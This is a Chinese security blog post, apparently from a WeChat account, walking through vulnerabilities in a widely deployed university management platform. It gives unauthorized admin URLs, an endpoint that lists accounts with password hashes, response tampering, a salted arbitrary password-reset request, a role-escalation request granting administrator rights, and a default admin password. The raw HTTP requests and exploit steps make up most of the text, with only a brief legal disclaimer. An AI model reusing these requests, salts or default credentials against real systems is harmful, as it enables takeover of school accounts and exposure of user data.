扫码领资料
获网安教程
前言
部分涉及账号来源于此篇https://bbs.zkaq.cn/t/31591.html
后续不要说明来源地址和重置信息
统一垂直
账号1信息
报文
功能点补充
发展中心后台未授权访问
url地址:http://xxx.edu.cn:8080/center/login/admin#/
未授权访问admin权限
服务门户后台管理未授权 && 垂直
保持统一认证登录状态,访问url地址:http://xxx.edu.cn/heportal/admin.html#/
说明:部分站点需CAS AUTH字段
直通是未授权
数据治理未授权 && 垂直
http://xxx.edu.cn:8002/data-quality/index.html#/manager
统一未授权
这个点最开始未授权直通,接口来源于重置的接口跟接口即可
地址1:https://xxx.com/userCtl/getPage?name=admin&page=1&size=10
通过naem指定用户列出用户账号,密码(sm3)值
统一只有这个是国标sm3,其他的m5
补一个m5贴图
表单垂直
HTTP/1.1 200
P3P: CP=CAO PSA OUR
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, DELETE
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: *
Content-Type: application/json
Date: Sun, 26 Jun 2022 00:45:37 GMT
Connection: close
Server: any version you want
Content-Length: 45
{"success":true,"errmsg":null,"result":false}
修改result字段 false修改为:true
未授权敏感泄露
同站不同接口
接口地址:data-quality/index.html#/abnormal_pyzy
目标管理系统弱口令
目标管理系统任意重置
ck带salt,js逆向过混淆跟值可逆到salt值为:qualty
将cookie进行使用,密码是654321的md5值(注:在加密之前需要加一个quality,例如重置为654321,需要加密的即为quality654321)
重置接口:/quality/restPassword
POST /quality/resetPassword HTTP/1.1
Host: xxx
Content-Length: 65
Accept: application/json, text/plain, /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Application-Name: nbzl_admin
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC
Connection: close
{"userId":"123","newpassword":"beab2c7769f424fd5ff0955b51f04dec"}
目标管理系统任意用户权限提升
需组合拳,任意重置配合使用
POST /quality/user/saveUserRoles HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Application-Name: nbzl_admin
Content-Length: 27
Connection: close
Cookie: JSESSIONID=FEFFE823B92A9863550051F9D4C167CC
{"id":"123","roleIds":"-2"}
roleids:-2是管理员id
目标管理系统任意删除
发展中心
同模板框架,上面目标管理系统该有的洞,这里都有 不多赘述
办事大厅
极少数有这个模块点
智慧教学
初始超级默认账密:admin/ABCDadmin
前缀ABCD 默认系统设置,可在系统管理中查看
部分站点存在后缀
这个是新旧两套系统
都是aes加密,需要js逆向拿iv 偏移量
通过aes可配置使用任意账号密码重置,这里的图丢失了
发展中心
可配和质管平台权限下发
写在最后
1、资产大概300+左右
2、每个子节点都是模块化设计,统一资产少,不代表资产就少
3、内网也挺多
SQL也很多,好多年前的 找不到了,将就看
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+靶场账号哦
原文始发于微信公众号(掌控安全EDU):某通用打包
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论